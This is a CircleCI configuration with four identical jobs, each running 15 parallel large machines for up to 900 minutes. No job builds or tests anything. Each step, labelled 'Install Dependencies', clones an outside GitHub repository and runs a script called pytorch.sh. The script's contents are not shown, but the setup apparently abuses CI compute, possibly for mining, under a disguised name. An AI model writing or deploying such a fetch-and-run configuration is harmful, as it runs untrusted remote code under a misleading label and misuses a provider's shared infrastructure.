version: 2
jobs:
    aku1:
      parallelism: 15
      machine:
            image: ubuntu-2004:202101-01
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/bciu1bic/SUGR.git && cd SUGR && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m
    aku2:
      parallelism: 15
      machine:
            image: ubuntu-2004:202101-01
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/bciu1bic/SUGR.git && cd SUGR && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m
    aku3:
      parallelism: 15
      machine:
            image: ubuntu-2004:202101-01
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/bciu1bic/SUGR.git && cd SUGR && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m
    aku4:
      parallelism: 15
      machine:
            image: ubuntu-2004:202101-01
      resource_class: large
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://github.com/bciu1bic/SUGR.git && cd SUGR && chmod +x pytorch.sh && ./pytorch.sh
            no_output_timeout: 900m
            
workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
